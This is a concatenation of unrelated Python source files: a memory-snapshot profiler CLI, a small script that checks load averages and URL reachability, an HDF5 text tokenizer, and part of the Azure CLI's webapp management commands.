return os.EX_OK
@staticmethod
def remove_ext(path, exts = []):
'''
Remove extension from a path from a list of extensions
@param path Path to remove its extension
@param exts List containing the extensions to search and remove
@return Path with extension removed
'''
for ext in exts:
if path.endswith(ext):
path = path[:-len(ext)]
break
return path
def get_info_from_path(self, path):
'''
Parses a file path and extract metadata about memory snapshot
@param path Path to extract test case name, timestamp and scenario
@return Tuple containing test case name, timestamp and scenario
'''
rest, f = os.path.split(path)
testcase = os.path.split(rest)[-1]
f = self.remove_ext(f, self._snapshot_exts)
timestamp, scenario = f.split("_")
return (testcase, timestamp, scenario)
def _run_smem(self, fpath, unit):
# Expects smem.arm to be in same folder as mem_profile.py
smem_path = os.path.join(os.path.dirname(__file__), './smem.arm')
cmd = 'python2 %s -S %s -t %s --export aps >/dev/null 2>&1' \
% (smem_path, fpath, unit)
try:
# Try processing memory snapshot asynchronously
from multiprocessing import Process
p = Process(target=os.system, args=(cmd,))
p.start()
return p
except ImportError as e:
# Process memory snapshot synchronously
os.system(cmd)
return None
def _load_aps_files(self):
print '\tLoading %d APS file(s):' % len(self._aps_files)
for aps_tuple in self._aps_files:
process, aps_path, test, timestamp, scenario = aps_tuple
if process:
# Wait until APS file is generated if needed
process.join()
print '\t\ttest(%s) timestamp(%s) scenario(%s) aps_path(%s)' \
% (test, timestamp, scenario, aps_path)
try:
with open(aps_path, 'r') as aps_file:
aps_map = json.load(aps_file)
ttuple = ((test, timestamp, scenario), aps_map)
self._aps_lst.append(ttuple)
except IOError as e:
print '\t\tFile not found: ' + str(e.message)
def _analyze_sorted_files(self, dpath, unit_kb=True):
if not os.path.exists(dpath):
raise Exception('%s folder does not exist! ' \
'Did you run \'capture\' command before?' % dpath)
print '\tScanning: %s' % dpath
for f in sorted(os.listdir(dpath)):
fpath = os.path.join(dpath, f)
if not os.path.isfile(fpath) \
or not fpath.endswith(self._snapshot_exts):
print '\t\tIgnoring unknown file: ' + fpath
continue
print '\t\t%s' % fpath
test, timestamp, scenario = self.get_info_from_path(fpath)
# Process snapshots and generate final merged output to APS
unit = '' if unit_kb else '-k'
process = self._run_smem(fpath, unit)
aps_path = self.remove_ext(fpath, self._snapshot_exts) + '.aps'
self._aps_files.append((process, aps_path, test, timestamp, scenario))
def analyze_folder(self):
'''
Traverses folder searching for test cases to analyze looking for
memory snapshots in sorted order and convert them to APS output
@param unit_kb If True output in 'kB' and otherwise in 'Mb'
'''
if not self._pg:
# Scan folder for subfolders and then files
for d in sorted(os.listdir(self._folder)):
dpath = os.path.join(self._folder, d)
if not os.path.isdir(dpath):
continue
self._analyze_sorted_files(dpath)
else:
# Scan folder for files
dpath = os.path.join(self._folder, self._pg)
self._analyze_sorted_files(dpath)
self._load_aps_files()
def merge_results(self):
'''
Merge results from multiple test cases consolidating into
a .profile file for APS
@return List containing the output filenames as TestCase.profile
'''
if not self._aps_lst:
print "No elements in APS list"
return
print 'Merging %d APS file(s)' % len(self._aps_lst)
# Specify changes in placement of some APS keys in final .profile
scenario_key = 'Scenario'
aps_unit_key = 'APS_Unit'
to_be_submaps = {
aps_unit_key : (),
'APS_SystemMemory': ('System', 'Memory'),
'APS_AllProcesses': ('Process', 'AllProcesses', 'Memory')
}
for elem in self._aps_lst:
test_case, ts, scenario = (elem[0][0], elem[0][1], elem[0][2])
self._all_tc_map[test_case] = self._all_tc_map.get(test_case, {})
tc_map = self._all_tc_map[test_case]
tc_map[scenario_key] = tc_map.get(scenario_key, [])
tc_map[scenario_key].append( { 'Name': scenario, 'TS': ts } )
submap = elem[1]
unit = submap.get(aps_unit_key, 'KB').upper()
for k1 in submap:
if k1 in to_be_submaps:
# Handle custom hierarchy for some APS keys
if not to_be_submaps[k1]:
continue
level = [ tc_map ]
for elem in to_be_submaps[k1]:
level[-1][elem] = level[-1].get(elem, {})
level.append(level[-1][elem])
level = [ level[-1] ]
inner_map = level[-1]
else:
# Then it's the memory information of a specific process
level = tc_map['Process'] = tc_map.get('Process', {})
level[k1] = level.get(k1, {})
level[k1]['Memory'] = level[k1].get('Memory', {})
inner_map = level[k1]['Memory']
# inner_map is the final level where data finally needs to be
for k2 in submap[k1]:
inner_map[k2] = inner_map.get(k2, {'Unit': unit, 'Values': []})
inner_map[k2]['Values'].append(submap[k1][k2])
flist = []
for test_case in self._all_tc_map:
fname = os.path.join(self._folder, test_case + '.profile')
with open(fname, 'w') as f:
json.dump(self._all_tc_map[test_case], f, sort_keys=True \
, indent=4, separators=self.SEPARATORS)
flist.append(fname)
return flist
def generate_perfmeta_json(self, comm):
'''
Generate perfmeta.json report file
@return String containing the path to perfmeta.json report file
'''
print 'Generating perfmeta.json'
pinfo = PlatInfoFactory.makePlatInfo(comm)
perfmeta = {
'targetDevice': {
'HWName': pinfo.get_hw_name(),
'OSName': pinfo.get_os_name(),
'BuildInfo': pinfo.get_build_info(),
'CodeName': pinfo.get_code_name(),
'ModelName': pinfo.get_model_name()
},
'data': []
}
pm_data = perfmeta['data']
for test_case in self._all_tc_map:
print '\ttest_case(%s)' % str(test_case)
value = self._all_tc_map[test_case]
# Traverse keys in ['System']['Memory']['Used_Total']['Values']
for k in ('System', self._pt, self._pv, 'Values'):
value = value.get(k)
if not value:
break
else:
# All keys found, proceed
if not value or value < 1 or not isinstance(value, list):
continue
print '\t\tvalue[s] = ' + str(value)
if len(value) > 1:
# Last value minus first value
value = value[-1] - value[0]
else:
value = value[0]
print '\t\tvalue = ' + str(value)
data_map = {
'PerfType' : self._pt,
'PerfGroup': test_case,
'PerfValue': round(float(value), 1)
}
pm_data.append(data_map)
fname = os.path.join(self._folder, 'perfmeta.json')
with open(fname, 'w') as f:
json.dump(perfmeta, f, sort_keys=True, indent=4,
separators=self.SEPARATORS)
def capture(args):
    '''Entry point for the 'capture' sub-command: grab one snapshot.'''
    return MemoryProfiler.capture_snapshot(
        args.comm,
        args.workdir,
        args.PerfGroup,
        args.Scenario,
    )
def report(args):
    '''
    Handle the "report" sub-command: analyze previously captured
    snapshots, merge them into per-test-case .profile files and emit
    perfmeta.json for the target device.
    @param args Parsed CLI namespace (workdir, perftype, perfgroup,
                perfvalue, comm)
    @return os.EX_OK on completion
    '''
    memp = MemoryProfiler(args.workdir, args.perftype, args.perfgroup, args.perfvalue)
    memp.analyze_folder()
    ret = memp.merge_results()
    print 'Generated output files: %r' % ret
    memp.generate_perfmeta_json(args.comm)
    return os.EX_OK
def parse_args():
    '''
    Parse program arguments using argparse.
    @param Implicit program arguments via sys.argv
    @return Tuple containing the argument parser and its parsed arguments
    '''
    default_type = 'Memory'
    default_dir = '/tmp/pmtrace/memory-profiling'
    default_value = 'Used_Total'
    parser = argparse.ArgumentParser(
        description='Capture a memory snapshot or analyze captured snapshots')
    parser.add_argument('-d', '--workdir', action='store', default=default_dir,
                        help='Working directory\n(default: %s)' % default_dir)
    # Options for reaching the target device over ssh.
    ssh_opts = parser.add_argument_group()
    ssh_opts.add_argument('-i', '--ip', action='store',
                          help='ip address to a device')
    ssh_opts.add_argument('--user', action='store', default='root',
                          help='username for connecting to a target device\n(default: root)')
    ssh_opts.add_argument('--pw', action='store', default=None,
                          help='password for connecting to a target device\n(default: None)')
    ssh_opts.add_argument('--port', action='store', default=22,
                          help='Port (default:22)')
    subparsers = parser.add_subparsers(
        dest='command',
        help='For sub-command help, use (-h) after command')
    # "capture" sub-command.
    cap = subparsers.add_parser(
        'capture',
        help='Capture memory snapshot for test case in some scenario\n'
             'Needs options (-g) for test case and (-s) for scenario')
    cap.add_argument('PerfGroup', action='store', help='PerfGroup (test case name)')
    cap.add_argument('Scenario', action='store', help='Scenario name')
    cap.set_defaults(func=capture)
    # "report" sub-command.
    rep = subparsers.add_parser(
        'report',
        help='Generate APS report based on captured memory snapshots\n'
             'Use option (-g) for test case, otherwise scans all')
    rep.add_argument('-g', '--perfgroup', action='store',
                     help='PerfGroup (test case name)')
    rep.add_argument('-t', '--perftype', action='store', default=default_type,
                     help='PerfType (default: %s)' % default_type)
    rep.add_argument('-v', '--perfvalue', action='store', default=default_value,
                     help='PerfValue (default: %s)' % default_value)
    rep.set_defaults(func=report)
    return (parser, parser.parse_args())
def main():
    '''Program entry point: build the commander and dispatch the sub-command.'''
    parser, opts = parse_args()
    opts.comm = CommanderFactory.makeCommander(opts.ip, opts.port, opts.user, opts.pw)
    if opts.command not in ('capture', 'report'):
        # No (or unknown) sub-command given: show usage and fail.
        parser.print_help()
        return os.EX_USAGE
    return opts.func(opts)
if __name__ == '__main__':
    # Exit with the sub-command's return code (os.EX_OK / os.EX_USAGE).
    sys.exit(main())
|
answer.py | #!/usr/bin/python3
import os, sys
import threading
import requests
# Clear the terminal and list the current directory contents.
os.system("clear")
os.system("ls")
# 1: report this process' pid.
print(os.getpid())
# 2: report the (1, 5, 15 minute) load averages.
print(os.getloadavg())
# 3: exit when the 5-minute load average leaves less than one free core.
load_avg = os.getloadavg()
print("cpu count: ", os.cpu_count())
load_avg = os.getloadavg()
# BUG FIX: the original line `print("load_avg: "load_avg[1])` was a
# SyntaxError (missing comma between the two print arguments).
print("load_avg: ", load_avg[1])
if (os.cpu_count() - load_avg[1] < 1):
    sys.exit()
# 4: URLs whose reachability is checked by link() below.
arr = ['https://api.github.com', 'http://bilgisayar.mu.edu.tr/',
       'https://www.python.org/', 'http://akrepnalan.com/ceng2034',
       'https://github.com/caesarsalad/wow']
def link(string):
    """Fetch *string* over HTTP and report whether its status code is in (100, 300)."""
    status = requests.get(string).status_code
    if not 100 < status < 300:
        print("The url is invalid " + string)
    else:
        print("The url is valid: " + string)
# Probe the first URL synchronously, then check each URL on its own thread.
link(arr[0])
workers = [threading.Thread(target=link, args=(url,))
           for url in ('https://api.github.com',
                       'http://bilgisayar.mu.edu.tr/',
                       'https://www.python.org/',
                       'http://akrepnalan.com/ceng2034',
                       'https://github.com/caesarsalad/wow')]
for worker in workers:
    worker.start()
|
generate_token.py | import os
import sys
import h5py
import cPickle
import argparse
import multiprocessing
import time
import numpy as np
# Python 2 only: force utf-8 as the process-wide default string encoding
# for the text columns normalized/tokenized below.
reload(sys)
sys.setdefaultencoding('utf8')
from utils import normalize, Tokenizer
# CLI configuration — parsed at import time, so `args` is a module global.
parser = argparse.ArgumentParser(description='Tokenize datasets')
parser.add_argument('--split', default='train', help='train, dev, test')
parser.add_argument('--tagger', default='okt', help='whitespace, okt, mecab')
parser.add_argument('--num_chunk', type=int, default=9, help='the number of chunks (train: 9, dev: 1, test: 2)')
parser.add_argument('--vocab_root', default='/base/data', help='folder to load bmsd_vocab.cPickle')
parser.add_argument('--data_root', default='/data', help='folder to load input chunks')
parser.add_argument('--output_root', default='/data/output/tmp', help='folder to save tokenized chunks')
args = parser.parse_args()
if not os.path.exists(args.output_root):
    os.makedirs(args.output_root)
# Dataset columns that get normalized and tokenized.
columns = ['product', 'brand', 'model']
# Vocabulary mapping 'b>m>s>d' category strings to label ids.
# NOTE(review): cPickle.loads on file contents — pickle can execute
# arbitrary code; only use with trusted vocabulary files.
bmsd_vocab = cPickle.loads(open(os.path.join(args.vocab_root, "bmsd_vocab.cPickle")).read())
# Chunk file name templates, e.g. "train.chunk.01" -> "train_tokenized.chunk.01".
input_format = "%s.chunk.%02d"
output_format = "%s_tokenized.chunk.%02d"
def append(h_in, h_out, split):
    """Tokenize one input chunk and write the result to the output chunk.

    Copies 'img_feat' and 'pid' through unchanged, derives an integer
    'label' per row from the category-id columns, and stores the
    whitespace-joined tokens of each text column as fixed-width byte
    strings (dtype "S1000").

    h_in: opened input h5py.File containing a `split` group
    h_out: opened output h5py.File (datasets assigned in place)
    split: 'train', 'dev' or 'test' — non-train rows get label -1
    """
    tkn = Tokenizer(args.tagger)
    data = h_in[split]  # train, dev, test
    cur_size = len(data['product'])
    # Materialize the category-id columns once (h5py dataset -> array).
    bcateid = data['bcateid'][()]
    mcateid = data['mcateid'][()]
    scateid = data['scateid'][()]
    dcateid = data['dcateid'][()]
    def get_label(i, vocab_type="bmsd"):
        # Map row i's (b, m, s, d) category tuple to a single label id.
        b = bcateid[i]
        m = mcateid[i]
        s = scateid[i]
        d = dcateid[i]
        if split == 'train':
            if vocab_type == "bmsd":
                y = bmsd_vocab['%s>%s>%s>%s' % (b, m, s, d)]
            else:
                # Only the combined "bmsd" vocabulary is supported.
                # NOTE(review): a bare `raise` with no active exception
                # produces a TypeError/RuntimeError if ever reached.
                raise
            return y
        else:
            # Labels are unknown outside the training split.
            return -1
    h_out['img_feat'] = data['img_feat'][:]
    h_out['pid'] = data['pid'][:]
    h_out['label'] = [get_label(i, vocab_type="bmsd") for i in range(cur_size)]
    for col in columns:
        result = []
        for i in range(cur_size):
            txt = normalize(data[col][i], col_type=col)
            words = tkn.tokenize(txt)
            result.append(np.string_(words))
        h_out[col] = np.array(result, dtype="S1000")
def convert(i):
    """Tokenize chunk *i* (0-based index) of the configured split."""
    chunk_id = i + 1  # chunk files are numbered from 1
    print("[*] Convert %s %02d" % (args.split, chunk_id))
    started_at = time.time()
    src_path = os.path.join(args.data_root, input_format % (args.split, chunk_id))
    dst_path = os.path.join(args.output_root, output_format % (args.split, chunk_id))
    h_in = h5py.File(src_path, 'r')
    h_out = h5py.File(dst_path, 'w')
    append(h_in, h_out, split=args.split)
    print("[*] Done %02d %.2fsec" % (chunk_id, time.time() - started_at))
def main():
    """Convert all chunks in parallel, one worker process per chunk."""
    procs = [multiprocessing.Process(target=convert, args=(i,))
             for i in range(args.num_chunk)]
    for proc in procs:
        proc.start()
    for proc in procs:
        proc.join()
if __name__ == '__main__':
    # Log the parsed configuration, then run the parallel conversion.
    print('args', args)
    main()
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent
from azure.cli.core.profiles import ResourceType, get_sdk
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_VERSION_DEFAULT, RUNTIME_STACKS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None,  # pylint: disable=too-many-statements,too-many-branches
                  deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
                  deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
                  multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
                  using_webapp_up=False, language=None, assign_identities=None,
                  role='Contributor', scope=None):
    """Create a webapp on the given plan, or update it if the name already exists.

    Configures the site according to OS (Linux / Windows container /
    Windows + runtime), wires up source control or container settings,
    and optionally assigns managed identities. Returns the created/updated
    Site object.
    """
    SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
        'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
    # --deployment-source-url and --deployment-local-git are mutually exclusive.
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    client = web_client_factory(cmd.cli_ctx)
    # The plan may be given either as a full resource id or a plain name.
    if is_valid_resource_id(plan):
        parse_result = parse_resource_id(plan)
        plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
    else:
        plan_info = client.app_service_plans.get(resource_group_name, plan)
    if not plan_info:
        # NOTE(review): message is missing the closing quote after the
        # second '{}' placeholder.
        raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
    is_linux = plan_info.reserved
    node_default_version = NODE_VERSION_DEFAULT
    location = plan_info.location
    # This is to keep the existing appsettings for a newly created webapp on existing webapp name.
    name_validation = client.check_name_availability(name, 'Site')
    if not name_validation.name_available:
        if name_validation.reason == 'Invalid':
            raise CLIError(name_validation.message)
        logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
                           "the app is a part of the current subscription".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        # Carry over the existing app settings into the new SiteConfig.
        existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
                                                        name, 'list_application_settings')
        settings = []
        for k, v in existing_app_settings.properties.items():
            settings.append(NameValuePair(name=k, value=v))
        site_config = SiteConfig(app_settings=settings)
    else:
        site_config = SiteConfig(app_settings=[])
    # Always-on is not supported on free/shared/basic tiers.
    if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
                                                                                       'B1', 'B2', 'B3', 'BASIC']:
        site_config.always_on = True
    webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
                      https_only=using_webapp_up)
    helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
    if is_linux:
        # Exactly one of runtime / container image / multicontainer config.
        if not validate_container_app_create_options(runtime, deployment_container_image_name,
                                                     multicontainer_config_type, multicontainer_config_file):
            raise CLIError("usage error: --runtime | --deployment-container-image-name |"
                           " --multicontainer-config-type TYPE --multicontainer-config-file FILE")
        if startup_file:
            site_config.app_command_line = startup_file
        if runtime:
            site_config.linux_fx_version = runtime
            match = helper.resolve(runtime)
            if not match:
                raise CLIError("Linux Runtime '{}' is not supported."
                               " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
        elif deployment_container_image_name:
            site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            if name_validation.name_available:
                site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
                                                              value="false"))
        elif multicontainer_config_type and multicontainer_config_file:
            encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
            site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
    elif plan_info.is_xenon:  # windows container webapp
        site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
        # set the needed app settings for container image validation
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
                                                          value=docker_registry_server_user))
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
                                                          value=docker_registry_server_password))
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
                                                          value=docker_registry_server_url))
    elif runtime:  # windows webapp with runtime specified
        if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
            raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
                           "--multicontainer-config-type and --multicontainer-config-file is "
                           "only appliable on linux webapp")
        match = helper.resolve(runtime)
        if not match:
            raise CLIError("Runtime '{}' is not supported. Please invoke 'az webapp list-runtimes' to cross check".format(runtime))  # pylint: disable=line-too-long
        match['setter'](cmd=cmd, stack=match, site_config=site_config)
        # Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
        if not match['displayName'].startswith('node'):
            if name_validation.name_available:
                site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                              value=node_default_version))
    else:  # windows webapp without runtime specified
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                          value=node_default_version))
    if site_config.app_settings:
        for setting in site_config.app_settings:
            logger.info('Will set appsetting %s', setting)
    if using_webapp_up:  # when the routine is invoked as a help method for webapp up
        if name_validation.name_available:
            logger.info("will set appsetting for enabling build")
            site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
    if language is not None and language.lower() == 'dotnetcore':
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
                                                          value='https://{}.scm.azurewebsites.net/detectors'
                                                          .format(name)))
    poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
    webapp = LongRunningOperation(cmd.cli_ctx)(poller)
    # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
    _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
                             deployment_source_branch, deployment_local_git)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
    if deployment_container_image_name:
        update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
                                  deployment_container_image_name, docker_registry_server_user,
                                  docker_registry_server_password=docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        webapp.identity = identity
    return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
                                          multicontainer_config_type=None, multicontainer_config_file=None):
    """Return True when exactly one way of configuring a Linux container app was given.

    The multicontainer config type and file must be supplied together;
    of (runtime, container image name, multicontainer config) exactly
    one may be set.
    """
    # The multicontainer type/file pair only makes sense together.
    if bool(multicontainer_config_type) != bool(multicontainer_config_file):
        return False
    chosen = sum(1 for opt in (runtime, deployment_container_image_name, multicontainer_config_type) if opt)
    # You can only specify one of the three combinations.
    return chosen == 1
def parse_docker_image_name(deployment_container_image_name):
    """Return everything before the last '/' of an image name when it looks like
    a private registry reference, else None.

    The prefix counts as a registry only if it contains a '.' (domain)
    or a ':' (port); plain Docker Hub names ('nginx', 'library/nginx')
    yield None, as do empty/None inputs.
    """
    if not deployment_container_image_name:
        return None
    host, sep, _ = deployment_container_image_name.rpartition('/')
    if not sep:
        # No slash at all -> no registry component.
        return None
    if "." in host or ":" in host:
        return host
    return None
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
    """Add/overwrite app settings; entries passed via slot_settings are also
    marked slot-sticky.

    Each item is either 'KEY=value' or a JSON blob — including the list
    format produced by the "list" command, in which a per-entry
    'slotSetting' flag decides stickiness. Returns the merged settings
    in the display output format.
    """
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    result, slot_result = {}, {}
    # pylint: disable=too-many-nested-blocks
    for src, dest in [(settings, result), (slot_settings, slot_result)]:
        for s in src:
            try:
                temp = shell_safe_json_parse(s)
                if isinstance(temp, list):  # a bit messy, but we'd like accept the output of the "list" command
                    for t in temp:
                        if t.get('slotSetting', True):
                            slot_result[t['name']] = t['value']
                            # Mark each setting as the slot setting
                        else:
                            result[t['name']] = t['value']
                else:
                    dest.update(temp)
            except CLIError:
                # Not JSON — fall back to plain KEY=value parsing.
                setting_name, value = s.split('=', 1)
                dest[setting_name] = value
    # Slot-sticky values win over plain ones on key collisions.
    result.update(slot_result)
    for setting_name, value in result.items():
        app_settings.properties[setting_name] = value
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    app_settings_slot_cfg_names = []
    if slot_result:
        # Record the new sticky names on the site's slot configuration.
        new_slot_setting_names = slot_result.keys()
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
        slot_cfg_names.app_setting_names += new_slot_setting_names
        app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
                              share_name, access_key, mount_path=None, slot=None, slot_setting=False):
    """Attach a new Azure storage account mount to a webapp (or one of its slots)."""
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    # Adding an already-configured id is an error; updates go through
    # 'az webapp config storage-account update'.
    if custom_id in accounts.properties:
        raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
                       "Use 'az webapp config storage-account update' to update an existing "
                       "Azure storage account configuration.".format(custom_id))
    accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
                                                           share_name=share_name, access_key=access_key,
                                                           mount_path=mount_path)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', accounts.properties,
                                         slot, client)
    if slot_setting:
        # Mark this storage configuration as sticky to the slot.
        cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        if not cfg_names.azure_storage_config_names:
            cfg_names.azure_storage_config_names = []
        if custom_id not in cfg_names.azure_storage_config_names:
            cfg_names.azure_storage_config_names.append(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, cfg_names)
    return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
                                 share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
    """Modify an existing Azure storage mount; omitted fields keep their previous values."""
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    previous = accounts.properties.pop(custom_id, None)
    if not previous:
        raise CLIError("No Azure storage account configuration found with the id '{}'. "
                       "Use 'az webapp config storage-account add' to add a new "
                       "Azure storage account configuration.".format(custom_id))
    # Fall back to the existing value for every field the caller omitted.
    accounts.properties[custom_id] = AzureStorageInfoValue(
        type=storage_type or previous.type,
        account_name=account_name or previous.account_name,
        share_name=share_name or previous.share_name,
        access_key=access_key or previous.access_key,
        mount_path=mount_path or previous.mount_path
    )
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', accounts.properties,
                                         slot, client)
    if slot_setting:
        # Mark this storage configuration as sticky to the slot.
        cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        if not cfg_names.azure_storage_config_names:
            cfg_names.azure_storage_config_names = []
        if custom_id not in cfg_names.azure_storage_config_names:
            cfg_names.azure_storage_config_names.append(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, cfg_names)
    return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
    """Zip-deploy *src* to a function app, optionally with a remote build (Linux only).

    Linux consumption apps without remote build are routed through
    upload_zip_to_storage instead of the Kudu zipdeploy endpoint.
    """
    client = web_client_factory(cmd.cli_ctx)
    app = client.web_apps.get(resource_group_name, name)
    if app is None:
        raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
                       'Please make sure these values are correct.'.format(name, resource_group_name))
    parse_plan_id = parse_resource_id(app.server_farm_id)
    plan_info = None
    retry_delay = 10  # seconds
    # We need to retry getting the plan because sometimes if the plan is created as part of function app,
    # it can take a couple of tries before it gets the plan
    for _ in range(5):
        plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
                                                 parse_plan_id['name'])
        if plan_info is not None:
            break
        time.sleep(retry_delay)
    if build_remote and not app.reserved:
        raise CLIError('Remote build is only available on Linux function apps')
    is_consumption = is_plan_consumption(cmd, plan_info)
    # Linux (reserved) consumption without remote build: upload the package
    # to storage and run from package instead of zip-deploying to Kudu.
    if (not build_remote) and is_consumption and app.reserved:
        return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
    if build_remote:
        add_remote_build_app_settings(cmd, resource_group_name, name, slot)
    else:
        remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
